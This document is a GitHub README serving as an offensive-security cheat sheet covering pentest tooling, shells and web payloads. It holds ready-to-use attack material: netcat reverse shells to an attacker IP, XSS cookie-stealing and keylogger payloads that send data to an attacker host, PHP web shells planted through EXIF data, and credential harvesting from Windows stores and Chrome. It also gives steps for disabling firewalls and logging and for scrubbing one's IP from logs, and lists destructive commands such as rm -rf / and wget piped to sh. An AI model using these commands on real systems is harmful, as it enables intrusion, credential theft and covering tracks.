Skip to content

Kode-n-Rolla/pentesting_time

Repository files navigation

Typing SVG

Welcome to my offensive security cheat sheet library.

Please use responsibly and ethically, especially when exploring sensitive security concepts.

There are:

  1. Network tools
  2. Web Shells
  3. Scripts
  4. Commands
  5. Payloads with description. Here just payloads in file
  6. Sites
  7. Tools
  8. Privilege Escalation
  9. Tips
  10. GPTs (Agents) for Cybersecurity
  11. OSINT
  12. API
  13. WordPress
  14. JWT
  15. Help with Pentesting and Bug Bounty processes
  16. Cloud
  17. Active Directory

    N.B. <-- Back link - Means return to the table of contents.

Commands

Topic contains:
  • Remote Desktop Protocol (RDP)
  • PowerShell
  • Linux
  • Windows
  • Nmap commands with search vulnerabilities scripts
  • Gobuster
  • Hydra
  • Dirsearch
  • Pumping shell
  • SQLmap
  • John The Ripper
  • Hashcat
  • Google Dorks
  • GitHub Dorking
  • Ffuf
  • Rustscan
  • Masscan
  • Meterpreter
  • CMD (Windows)
  • Reverse shell
  • Git
  • SSH and id_rsa
  • Clear log files
  •       Remote Desktop Protocol (RDP):

     xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:<TARGET_IP> /u:<USERNAME> /p:<'PASSWORD'> 

     xfreerdp /v:<TARGET_IP> /u:<USERNAME> /p:<PASSWORD> +clipboard 

          PowerShell commands

    • To get stable shell from unstable from PowerShell. FILENAME.exe is the reverse shell:
       powershell -c "Invoke-WebRequest -Uri 'http://<LOCAL_IP>:<PORT>/<FILENAME.exe>' -OutFile 'C:\Windows\Temp\<FILENAME.exe>'" 
    • With this command, you can identify files with potentially sensitive data such as account information, credentials, configuration files, etc. based on their filename:

      gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue
    • This command will look for remnants of autosets and autoconfigurations that could potentially contain plain text or base64 encoded passwords:

      gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue
    • With this command it is possible to find files containing a specific pattern, for example here we are looking for the "password" pattern in various text configuration files:

      gci c:\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password"
    • Using the following PowerShell command, you can find database connection strings (with plain text credentials) stored in various configuration files such as web.config for ASP.NET configuration, Visual Studio project files, etc.:

      gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"
    • With this command, you can easily find configuration files belonging to a Microsoft IIS, XAMPP, Apache, PHP, or MySQL installation:

      gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue
    • With the following one-liner, we can retrieve all stored credentials from the credential manager using the CredentialManager PowerShell module:

      Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); }
    • The following command retrieves saved credentials from the Google Chrome browser, if installed and if there are saved passwords:

      [System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser))
    • The following command will get the autologin credentials from the registry:

      gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*"
    • Sometimes it can be useful to set the MAC address on a network interface, and with PowerShell we can easily do this without using third party utilities:

      Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D"
    • This trio of commands can be useful when there is a goal to connect to the system using a graphical RDP session, but for some reason it is not enabled:

      Allow RDP connections -

      (Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1)

      Disable NLA -

      (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)

      Allow RDP on the firewall -

      Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled True
    • Here is a useful command to whitelist an IP address in Windows Firewall:

      New-NetFirewallRule -Action Allow -DisplayName "name_rule" -RemoteAddress <DESIRED_IP>
      After we are done with our cases, remove the rule:
      Remove-NetFirewallRule -DisplayName "name_rule"
    • With the following commands, we can disable the logging feature of PowerShell commands in the current shell session:

      Set-PSReadlineOption –HistorySaveStyle SaveNothing

      OR

      Remove-Module PSReadline
    • Here is a simple PowerShell command to query the Security Center and determine all installed antivirus products on this computer:

      Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct

          Linux

    ExplainShell - provides a convenient interface for searching help information for any command

        Commands to find

    • Find all files in / directory (-type d for find dirs):

       find / -type f 
    • File name search:

       find / -type f | grep '<FILE_NAME>' 
    • Find all path files with ‘config’ in proc dirs:

       find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null 
    • To turn off send hostname via DHCP

       sudo nano /etc/NetworkManager/system-connections/Wired\ connection\ 1 

         [ipv4]

         method=auto

         dhcp-send-hostname=false

    • To allow traffic routing on your part (Main rule for MITM)

       sudo sysctl -w net.ipv4.ip_forward=1 
    • Transferring files
       scp <FILE_NAME> <USERNAME>@<TARGET_HOST>:</path/to/dir/on/victim_machine>
       wget http://<ATTACKER_IP>:<ATTACKER_PORT>/<FILE_NAME> 
       curl http:///<ATTACKER_IP>:<ATTACKER_PORT>/<FILE_NAME> -o <FILE_NAME> 

        Never run these Linux commands:

    • This command will delete all files and folders on your computer:
       rm -rf /  
    • Also known as a "fork bomb", this command can cause a memory overflow on your computer and lead to system crash:
       :(){ :|: & };: 
    • This command formats the hard drive without any warning or confirmation. All data will be lost:
       mkfs.ext4 /dev/sda 
    • This command overwrites all data on the hard drive with random values, resulting in data loss:
       dd if=/dev/random of=/dev/sda 
    • This command grants full access to your file system for all users, which can compromise security:
       chmod 777 / 
    • This command moves all files in your home directory to "null", effectively deleting them:
       mv /home/* /dev/null 
    • This command downloads a file and overwrites all data in "null", resulting in data loss:
       wget http://example.com/file -O /dev/null 
    • This command formats the hard drive partition without any warning or confirmation. All data on this partition will be lost:
       mkfs.ext4 /dev/sda1 
    • This command creates a symbolic link to "/etc/passwd" in "null", resulting in data loss:
       ln -s /dev/null /etc/passwd 
    • This will replace your partition containing all the necessary data for booting the system with the string "Hello":
       echo "Hello" > /dev/sda 
    • Such commands will download and execute malicious scripts on your system, potentially compromising your system's security:
       wget http://malicious_source -O- | sh 

          Windows

        Commands to find

    1. This command searches for the string "password" inside all files with the extensions .xml, .ini, .txt, and .config on the current C: drive:
      cd C:\ & findstr /s /p /i /n /m "password" *.xml *.ini *.txt *.config
      • cd C:\ - changes to the root directory of the C: drive
      • findstr - command for searching strings in files
      • /s - performs a search in all subdirectories
      • /p - skips files with non-printable characters
      • /i - ignores case sensitivity when searching for strings
      • /n - displays the line number containing the string
      • /m - displays only the file name if a match is found
    2. dir - like ls in linux
    3. tree utility is useful for graphically displaying the directory structure of a path or disk

      tree c:\ /f | more - used to walk through all the files in the C drive

    4. icacls

      The resource access level:

      • (CI): container inherit
      • (OI): object inherit
      • (IO): inherit only
      • (NP): do not propagate inherit
      • (I): permission inherited from parent container
      Basic access permissions:
      • F : full access
      • D :  delete access
      • N :  no access
      • M :  modify access
      • RX :  read and execute access
      • R :  read-only access
      • W :  write-only access
      A full listing of icacls command-line arguments and detailed permission settings can be found here.

          Nmap with vulnerse script (1)

    Need to download script files from github and copy to nmap scripts folder. Thanks for that, Vulners Team !

    Checking for a vulnerability in the software on the server:

     Nmap -Pn <TARGET_IP> --script=vulners.nse -p<PORT(S)> 
    Checking brute force resistance on ssh:

     nmap --script ssh-brute -p <SSH_PORT> <TARGET_IP> --script-args userdb=users.lst,passdb=passwords.lst 
    Checking brute force resistance on ftp:

     nmap -d --script ftp-brute -p <FTP_PORT> <TARGET_IP> 
    Checking mysql anonymous login:

     nmap -sV --script=mysql-empty-password <TARGET_IP> 
    Attempts to select a pair of login/password to enter the mysql database:

     nmap --script mysql-brute -p <MYSQL_PORT> <TARGET_IP> --script-args userdb=users.lst, passdb=passwords.lst 
    Search for hidden folders and files:

     nmap -sV -p <PORT> --script http-enum <TARGET_IP> 

    P.S. If CMS, research <name_0f_CMS_0r_DB> brute force nmap

    P.P.S. Full list of NMAP NSE sctipts.

      Catogories: auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, vuln.

          Nmap with vulnerse script (2)

    Need to install script. Thanks for that, Scip ag!
    1.  git clone https://github.com/scipag/vulscan.git 

      Or read Scip ag instructions. It`s easy.

    2. Copy to /usr/share/nmap/scripts/ or another folder where you keep nmap scripts
    3. Get rights
    4.  nmap -sV --script=vulscan/vulscan.nse <TARGET> 

          Gobuster command:

       Directories enumeration:

    -u - target url

    -w - wordlist

    -s - include only responses with the specified status codes (comma-separated)

    -d - exclude responses with the specified status codes (comma-separated)

    --exclude-length - exclude responses with specific content lengths (comma-separated, supports ranges)

    gobuster dir -u <TARGET_URL> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
       Subdomains enumeration:

    vhost - for enumirate virtual hosts

    gobuster vhost -w </path/to/wordlist> -u <url>
        OR

    t - threads

    gobuster dns <TARGET_DOMAIN> -w /usr/share/wordlists/dns/subdomains_list.txt -t 50

          Hydra

        Brute force against a protocol of some choice:
     hydra -P <WORLIST> -v <TARGET_IP> <PROTOCOL> 

        Brute Force ssh:

    hydra -L /path/to/file/user.txt -P /path/to/file/pass.txt <TARGET_IP> ssh -t 4

        Brute Force smb example:

     hydra -L ~/path/to_file/user.txt -P ~.path/to_file/pass.txt <TARGET_IP> smb -V

        Can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in some lists. (-vV = verbose mode, showing login attempts):

     hydra -v -V -u -L <USERNAME_LIST> -P <PASSWORD_LIST> -t 1 -u <TARGET_IP> <PROTOCOL> 

        Attack a Windows Remote Desktop with a password list:

     hydra -t 1 -V -f -l <USERNAME> -P <WORDLIST> rdp://<TARGET_IP> 

        Craft a more specific request for Hydra to brute force:

     hydra -l <USERNAME> -P .<PASSWORD_LIST> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' 

          Dirsearch

    Search a lot of interesting by extensions:
     dirsearch -e php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx -u '<TARGET_IP>' 

          Way to pump nc shell

    • Python way. PTY is a library for pseudo-terminal functionality that is part of the Standard Python Library. There is a nc shell and get pump shell:
       python -c 'import pty;pty.spawn("/bin/bash")' 

      After nc connecting:

      stty raw -echo && fg

      If no python:

      /usr/bin/script -qc /bin/bash /dev/null
    • Another way:
      script /dev/null -c /bin/bash
      Console to bg (Ctrl+Z) ->
      stty raw -echo; fg
      Then double Enter and we again in shell and input
      export TERM=xterm

          SQLmap

        Start SQL injection attack:
    sqlmap -u "<TARGET_URL>" --dbs --batch
    -u - target URL

    --dbs - get db name

    --batch -default whenever user input is unavoidable

        When get the db name to get tables name

    sqlmap -u "<TARGET_URL>" -D <db_name> --tables --batch
    -D - db name

    --tables - tables enumiration

        To get columns name in the table of interest

    sqlmap -u "<TARGET_URL>" -D <db_name> -T <table_name> --columns --batch
    -T - selected table

    --columns - to output db columns

        Get data from table

    sqlmap -u "<TARGET_URL>" -D <db_name> -T <table_name> --dump --batch
    --dump - unload information from the DBMS database

        Will execute all the above functions at once and output all information about the database, including table names, columns, etc.

    sqlmap -u "<TARGET_URL>" -D <db_name> --dump-all --batch
    --dump-all - unload all information from the DBMS database

          John The Ripper

    Firstly use hash-identifier.

        Cracking some type of hashes:

    john --format=raw-<encryption> --wordlist=path/to/wordlist.txt to_crack.txt
    <encryption> - md4, md5, sha1, sha256, whirlpool

        Single Mode

    There is a username and hash password (username:d776dd32d662b8efbdf853837269bd725203c579 and this line in file to-crack.txt), so use this mode to generate password variations (Username, USERNAME, UseRNAmE, and so on):

    john --single --format=raw-sha1 to_crack.txt

        Dictionary Mode

    There is a file to_crack.txt with edba955d0ea15fdef4f61726ef97e5af507430c0, for example.

    The command to run John in dictionary mode using the wordlist:

    john --wordlist=path/to/wordlist.txt --format=raw-sha1 to_crack.txt

        Incremental Mode

    It tries all possible character combinations as passwords. Can go on for a long time if the password is too long or a combination of alphanumeric characters and symbols:

    john -i:digits passwordfile.txt

    -i - tells John that to use the increment mode

    digits - can be used to set the maximum number of digits in the password

        To crack LM/NTLM:

    john --format=lm to_crack.txt

        To crack a Linux password

    The unshadow command combines the passwd (/etc/passwd) and shadow(/etc/shadow) files together into a single file. This can then be used by John to crack passwords.

    The command will combine the files together and create an output.db file:

    unshadow /etc/passwd /etc/shadow > output.db

    Now crack the output.db file:

    john output.db

        Cracking a Zip file password

    First have to get the hash of the zip file’s password. Command will get the hash from the zip file and store it in the zip.hashes file:

    zip2john file.zip > zip.hashes

    Then to crack the hash:

    john zip.hashes

          Hashcat

        MD5 Hashes

    hash.txt > 8743b52063cd84097a65d1633f5c74f5

    Use:

    hashcat -m 0 -a 0 hash.txt passwordlist.txt

    -m 0 - MD5 hash mode

    -a 0 - dictionary mode

    hash.txt - txt file containing hash in a compliant format

    passwordlist.txt - dictionary file containing passwords in plain text

        Salted MD5 Hashes

    hash.txt > md5($pass.$salt): 01dfae6e5d4d90d9892622325959afbe:7050461

    hashcat -m10 -a0 hash.txt passwordlist.txt

    -m 10 - salted MD5 hash mode

        MD5Crypt Digets

    hash.txt > md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) $1$28772684$iEwNOgGugqO9.bIz5sk8k/

    hashcat -m 500 -a 0 hash.txt passwordlist.txt

    -m 500 - MD5Crypt Digests hash mode

        HMAC-SHA1 key

    hash.txt > HMAC-SHA1 (key = $pass) c898896f3f70f61bc3fb19bef222aa860e5ea717:1234

    hashcat -m150 -a 0 hash.txt passwordlist.txt

    -m 150 - HMAC-SHA1 key hash mode

        SHA-1 Digets

    hash.txt > b89eaac7e61417341b710b727768294d0e6a277b

    hashcat -m100 -a 0 hash.txt passwordlist.txt

    -m 100 - SHA1 digest hash mode

        SHA2-384 Hash

    hash.txt > SHA2-384 07371af1ca1fca7c6941d2399f3610f1e392c56c6d73fddffe38f18c430a2817028dae1ef09ac683b62148a2c8757f42

    hashcat -m 10800 -a 0 hash.txt passwordlist.txt

    -m 10800 - SHA-2 Digests hash mode

        SHA3-512 Hash

    hash.txt > SHA3–512 7c2dc1d743735d4e069f3bda85b1b7e9172033dfdd8cd599ca094ef8570f3930c3f2c0b7afc8d6152ce4eaad6057a2ff22e71934b3a3dd0fb55a7fc84a53144e

    hashcat -m 17600 -a 0 hash.txt passwordlist.txt

    -m 17600 - SHA3–512 hash mode

        NTLM Hashes

    hash.txt > b4b9b02e6f09a9bd760f388b67351e2b

    hashcat -m 1000 -a 0 hash.txt passwordlist.txt

    -m 1000 - NTLM Digests hash mode

        CRC32 hashes

    hash.txt > c762de4a:00000000

     hashcat -m 11500 -a 0 hash.txt passwordlist.txt

    -m 11500 - CRC32 hash mode

          Google Dorks

    • site: - returns results for the specified domain
    • intitle: - search in title
    • inurl: - search by url
    • related: - returns sites to the specified one
    • ext: or filtype: - search by page extension or filetype
    • cahce:
    • intext:
    • allintext:
    • allinurl:
    • More here

          GitHub Dorking

    • AWS keys
      path:**/.env AWS_ACCESS_KEY_ID
    • Open DB passwords
      DB_PASSWORD=
    • DB dump files
      path:*.sql "CREATE TABLE" AND "INSERT INTO"
    • API keys
      path:**/.properties api_key
    • Root passwords in docker-compose
      path:**/docker-compose.yml MYSQL_ROOT_PASSWORD
    • Private keys
      path:*.pem private
    • Open secrets JWT
      language:javascript jwt_secret OR jwt_key
    • Open .git directories
      path:**/.git/*
    • Public ssh keys
      path:*.pub "ssh-rsa"
    • Passphrase
      passphrase * path:**/.json
    • Check commit and issues
    • Search and looking for vulns in codes (for example SQLi and SSRF)
      /SELECT \* FROM.*\$_GET/
      /file_get_contents\(.*\$_GET|curl_exec\(.*\$_GET/
      /(subprocess|exec|spawn|system).*chrome.*--headless/

          FFUF

    Flags:

    -mc (match code) - Include only responses that match the specified status codes (e.g., 200,204,301, 400-499)

    -ms (match size) - Include only responses that match a specific size or range of sizes

    -mw (match word count) - Include only responses that have the specified amount of words in the response body (-fw "admin")

    -ml (match line count) - Include only responses that have the specified amount of lines in the response body

    -mt (match time) - Include only responses that meet a specific time-to-first-byte (TTFB) condition. This is useful for identifying responses that are unusually slow or fast, potentially indicating interesting behavior

    -fc (filter code) - Exclude responses that match the specified status codes, using the same format as -mc

    -fs (filter size) - Exclude responses with a specific size or range of sizes

    -fw (filter word) - Enclude only responses containing the specified word or phrase in the response body

    -fl (filter line) - Exclude responses with a specific number of lines or range of lines. For example, -fl 5 will filter out responses with 5 lines

    -e - extension`s file

    -recursion - recursion fuzzing

    ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://<TARGET_IP>:<TARGET_PORT>/FUZZ -e .php,.html,.txt
    ffuf -w /path/to/wordlist1.txt -w /path/to/wordlist2.txt -u https://example.com/FUZZ?param=FUZZ -mc 200 -ic
    ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  -u http://<TARGET_IP>:<TARGET_PORT>/FUZZ -recursion
    ffuf -u http://<TARGET_URL> -H "FUZZ.<TARGET.DOMAIN>" -w /path/to/worlist

          Rustscan

    • Download deb packet
    • Install:
      sudo dpkg -i rustscan_2.0.1_amd64.deb
    • Use:
      • Simple ports scanning:
        rustscan -a www.<target_site.com>
      • Specific port scanning:
        rustscan -a www.<target_site.com> -p 443

        Or few ports:

        rustscan -a www.<target_site.com> -p 21,22,80,443
      • Ports detection in the range 1-1000:
        rustscan -a www.<target_site.com> --range 1-1000

          Masscan

    • Scanning a Single IP Address:
      masscan <target_ip>
    • Scanning an IP Range:
      masscan 192.168.0.0-192.168.0.255
    • Scanning Specific Ports:
      masscan -p80,443 192.168.0.1
    • Scanning All Ports:
      masscan -p0-65535 192.168.0.1
    • Setting Scan Rate:
      masscan -p80 192.168.0.1 --rate 10000

      --rate - lets set the scan rate. In this case, scanning occurs at 10,000 packets per second. Select the speed individually. IMHO 500-1000 is ok.

    • Saving Results to a File:
      masscan -p80 192.168.0.1 -oG results.txt

      -oG - allows to save scan results in grepable format to a file.

    • Scanning Specific Packet Types:
      masscan -p80 192.168.0.1 --packet 1-5

      --packet - lets specify packet types for scanning.

    • Scanning via SOCKS5 Proxy:
      masscan -p80 192.168.0.1 --source-ip <proxy_ip> --source-port <proxy_port>

      flags allows to specify the source IP and port for scanning through a SOCKS5 proxy.

          Meterpreter

    • arp - displays MAC and IP addresses of local devices interacted with
    • cd - command to change to another directory/folder
    • clearev - clears logs (need administration privs)
    • dir/ls - lists files and folders in the specified directory
    • download - downloads files from the remote machine to the local machine
    • getpid - displays the process ID under which Meterpreter is running
    • getproxy - retrieves information about the system's proxy server
    • getsystem - attempts to escalate privileges
    • getuid - displays the current user on behalf of whom Meterpreter is running
    • hashdump - dump all password hashes
    • help - help, display help documentation
    • idletime - displays user inactivity time on the remote computer
    • ifconfig/ipconfig - displays network settings
    • migrate - migrates meterpreter to another process
    • netstat - displays current network connections
    • ps - lists all current processes
    • pwd - displays the current directory/folder
    • record_mic - records audio on the remote machine
    • route - displays the routing table
    • run persistance <with_parameters> - get backdoor (persistance help)
    • search - search for files, modules
    • show_mount - lists physycal and logical disks
    • sysinfo - dislays brief information about the remote system
    • upload - uploads files from the local machine to the remote machine
    • webcam_chat - organize a video chat
    • webcam_snap - takes a snapshot from the remote built-in camera
    • webcam_stream - obtains a video stream from the remote built-in camera
    • run post/multi/recon/local_exploit_suggester - recon for privesc
    • load kiwi - to load mimikatz

          CMD

    1. Clearing log files
      • wevtutil cl Application
      • wevtutil cl System
      • wevtutil cl Security

        OR check firewall settings to find location of log file

      • netsh firewall show config (old command)
      • netsh advfirewall show currentprofile (MS recomends that command) -> cd log file direcroty, more file.log for read -> disable firewall
      • netsh firewall set opmode disable - disables the firewall (old command)
      • netsh advfirewall set currentprofile state off
      • del file.log
    2. Viewing System Information
      • systeminfo - displays system information and installed patches
      • net user - lists local users
      • whoami /all - provides information the current user
      • driverquery - lists installed drivers
    3. Network Settings
      • ipconfig /all - shows network settings
      • ipconfig /displaydns - display cached DNS records
      • arp -a - lists IP addresses that the computer has communicated with
      • netstat - shows established connections
      • netstat -a - lists open ports
      • netstat -ao - displays open ports and associated IDs
      • netstat -abo - lists open ports, associated process IDs, and their names
      • netstat -r - shows the routing table
    4. Working with Services
      • tasklist - lists current processes
      • taskkill /f /pid "process_number" - terminates a process
      • schtasks - displays scheduled tasks
      • sc query - lists all services
      • sc query "service_name" - checks the status of a service
      • sc start/stop "service_name" - starts or stops service
      • net start - lists running services
    5. Working with the File System
      • cd - navigates through the file system
      • dir - lists files and folders in the current directory
      • dir /ah - displays hidden files and folders
      • dir /ad - lists folders only
      • dir /b /s "folder and search term" - searches for files based on a keyword
      • mkdir - creates a new folder
      rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
      

          Reverse Shell

    1.  rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER_IP> <ATTACKER_PORT> >/tmp/f 

         Git

    1. git log - show commits` history
    2. git diff - show difference between commits
    3. git blame - who and when changed line in file
    4. git checkout - change commit or branch
    5. git branch - show branches
    6. git tag - show all tags in the repo

         SSH and id_rsa

    • Copy id_rsa
    • chmod 600 id_rsa
    • to set right permissoon for use (It is required that your private key files are NOT accessible by others.)
    • Connect

         Clear log files

    1. Check log file coplies (for example ls -la /var/log/*.gz /var/log/*.1 /var/log/*.old)
    2. Save/check timestamps
    3. stat /var/log/* > /tmp/log_timestamps.txt
    4. Delete
    5. find /var/log -type f -exec sed -i '/YOUR_IP/d' {} \;
    6. Recover timestamps
    7. touch -r /var/log/auth.log.1 /var/log/auth.log

      Or use this script if save as in second stage

    8. Check result
    9. grep 'YOUR_IP' /var/log/*

    Payloads

  • LFI and File Upload Linux and Windwos Payloads
  • XSS Payloads
  • CSRF
  • Chains
  • Server Side Template Injection
  • CRLF
  •       LFI Payloads

    • For Linux
    • For Windows
    • %0a to bypass regex rules:
    • http://vuln.host/some.php?file=%0a../../../../etc/passwd
    • DotDotPwn can help with testing (sudo apt install dotdotpwn)
          File Upload Bypassing
    • Magic Bytes:
      • PNG - 89 50 4E 47 0D 0A 1A 0A
      • JPEG - FF D8 FF
      • GIF (FIG87a) - 47 49 46 38 39 61
    • Upload normal image file and intersept the request and try:
      • Change file extension to php5 and the same
      • Double extionsion
      • Null Byte
      • Change Content-Type
    • Injecting through EXIF Data:
    exiftool -comment="<?php system($_GET['cmd'])>" file.png
  • Raw Insertion
  • echo "<?php system($_GET['cmd'])>" >> file.jpeg

          XSS Payloads

    XSS.report. Suggest payloads too
    1. Proof Of Concept (PoC):
      <scRIPt>alert('Success XSS!');</sCriPt>
      print()
      prompt()
      <img src=x onerror=alert()>
      <img src=x onerror="window.location.href='http://some.site'>"
      <svg/onload=confirm("document.cookie")>
      <script>
          window.location = 'http://<ATTACKER_IP>:<ATTACKER_PORT>/page?param=' + document.cookie;
      </script>
      
      Like above, but only request without redirect
      <img src="http://<ATTACKER_IP>:<ATTACKER_PORT>/page?param=" + document.cookie>
      
    2. XSS -> LFI
      <script>
          x=new XMLHttpRequest;
          x.onload=function(){
              document.write(this.responseText)
          };
          x.open("GET","file:///etc/passwd");
          x.send();
      </script>
    3. This is the simplest of payloads where all you want to do is demonstrate that you can achieve XSS on a website.

      Session Stealing -

       <script>fetch('url/steal?cookie=' + btoa(document.cookie));</script> 

      Details of a user's session, such as login tokens, are often kept in cookies on the targets machine. The below JavaScript takes the target's cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker's control to be logged. Once the hacker has these cookies, they can take over the target's session and be logged as that user.

      Key Logger -

       document.onkeypress = function(v) {fetch('url/log?key=' + btoa(v.key));}</script> 

      The below code acts as a key logger. This means anything you type on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details.

      Business Logic -

       <script>user.changeEmail('[email protected]');</script> 

      This payload is a lot more specific than the above examples. This would be about calling a particular network resource or a JavaScript function. For example, imagine a JavaScript function for changing the user's email address called user.changeEmail().

      Polyglots -

       jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('Success XSS!'))//%0D%0A%0d%0a//\x3csVg/\x3e 

      An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one. You could have used the below polyglot on all six levels you've just completed, and it would have executed the code successfully.

    4. XSS Bypass WAF:
      <details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
    5. Try to download to bypass shielding file with name like:
      <img src=1 onerror=alert()>.png
    6. XSS through SVG file:
      
      <?xml verion="1.0" standalone="no"?>
      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg version="1.1" baseProfile="full" xmlns=""www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript">
      	alert(document.domain);
      </script>
      </svg>
      		    
    7. XSS through metadata

      Set header to Content-Type: text/html

      exiftool file.jpeg -Comment='<script>alert(1)</script>'
    8. Tips for exploit:
      • try to upload a file (image, svg, html) that contains xss payload inside
    9. Description of XSS payloads here

          CSRF

  • Temple for payload:
    		
    <html>
        <body>
            <form action="https://ACTION_URL.COM" method="POST">
    	    <input type="hidden" name="email" value="[email protected]" />
    	    <input type="hidden" name="csrf" value="YOUR_CSRF" />
    	</form>
    	<img src="https://URL_WITH_PARAMETER_ASSIGNMENT/?PARAM=TEST%0d%0aSet-Cookie:%20csrf=NEEDED_CSRF_TOKEN%3b%20SameSite=None" onerror="document.forms[0].submit();" />
        </body>
    </html>
    	
  • To avoid sending the referrer header:
    <meta name="referrer" content="never">
  • To send malicious request automatic:
    <script type="text/javascript">
    	document.forms[0].submit();
    </script>

          Chains

  • Redirect bypasses for Open Redirect & SSRF!
    ?u=example2\.com  ❎
    ?u=example\.com@example2\.com ✅

          SSTI

    • Polyglot:
      ${{<%[%'"}}%\

         CRLF

    %0D%0A
    • %0D — CR (Carriage Return)
    • %0A — LF (Line Feed)

    Sites

          Someone main

  • HackTricks - must have!!! PrivEsc, brute force, pentest network and wifi, metodologies cheatsheets and much more
  • Cloud HackTricks
  • Pentest notes
  • GTFO bins. How to escalqte privs, how to get shells and much more with binary in target system
  • LOLBAS. Help with Windows
  • Shell-Storm. DB of shell-codes
  • thehacker.recipes. Help with AD
  • appsecexplained.gitbook.ioHelp with explotation vulns.
  • Search engine bug bounty. Help with vulns scanning
  • interactsh.com. Like a Burp Collaborator.

          Cheat sheets, hints

  • Bash scripting
  • How pump nc shell
  • Nmap
  • PowerShell cheatsheet
  • PowerShell tips and tricks
  • ired.team. Pentesting Cheatsheets. Convenient commands for your pentesting / red-teaming engagements, OSCP and CTFs
  • 1, 2 and 3 can help with ports
  • Reverse Shell cheatsheet
  • A Great Vim Cheat Sheet
  • SQLi cheatsheet
  • Another one SQLi cheatsheet
  • SQLMap Command Generator
  • XSS.report. Help with xss payloads

          CVE and Vulnerabilities db

  • First.org. CVSS calculator 3.0
  • Cvexploits.io
  • CVE.circl db
  • CVSS search vulnerability
  • CVE.mitre db of Common Vulnerabilities and Exposures
  • Lana Codes Vulnerability Database (WordPress plugins)
  • Vulners.com database
  • OffSec exploit db
  • Rapid7 db
  • Vuldb.com platform for control vulnerabilities and Threat analysis
  • 0day db. Need tor
  • Routers db

          Dorks

  • Dorki.io.
  • Dorks examples for Bug Bounty
  • Dorksearch.com
  • Dorkgenius.com. Custom Creator Search Dork
  • Dorks helper
  • Another dorks helper

          Hashes, encode/decode, cracker, identify

  • crackstation.net - online password hash cracker
  • Base64 encode/decode
  • Identify hash types
  • CyberChef - encode/decode service
  • Flask Session Cookie Decoder
  • NTLM.pw. Help with NTLM hashes.
  • RSA calculator

          Learning Path & Practise

  • CEH
  • Root.me
  • CTF365 - suitable for security professionals looking to acquire offensive skills, or system administrators interested in enhancing their defensive skills
  • Cryptohack. A free, fun platform for learning modern cryptography
  • TryHackMe
  • HackTheBox
  • Port Swigger
  • Pentersterlab.com. Сourses explaining vulnerabilities
  • Apisecuniversity. Free, Real-World‍ API Security Training
  • Ohmygit.org. Help with git in play mode.
  • HackThisSite - a free website with wargames to test and improve your white hat hacking skills. It offers a variety of hacking challenges in several categories, ncluding basic tasks, fricking, JavaScript, forensics, steganography, and more
  • Hackaday - serves up Fresh Hacks Every Day from around the Internet
  • CTFtime. CTF practice
  • BWAPP - buggy web application. Virtual pentest laboratory to practice
  • Free set of practice tasks. Thanks to TheXSSrat
  • OVERTHEWIRE - uitable for anyone looking to learn the theory of information security and apply it in practice regardless of their experience level
  • HACKING-LAB - provides CTF challenges for the European Cyber Security Challenge, but they also host regular competitions on their platform that anyone can participate in
  • PWNABLE.KR - this platform focuses on pwn challenges similar to CTF, which involve finding, reading, and submitting flag files that are present in each task
  • W3Challs - an educational platform with a variety of tasks in different categories, including hacking, wargames, forensics, cryptography, steganography, and programming. The platform aims to provide realistic challenges. Depending on the difficulty of the solved task, you earn points. There is also a forum where you can discuss and solve tasks with other participants
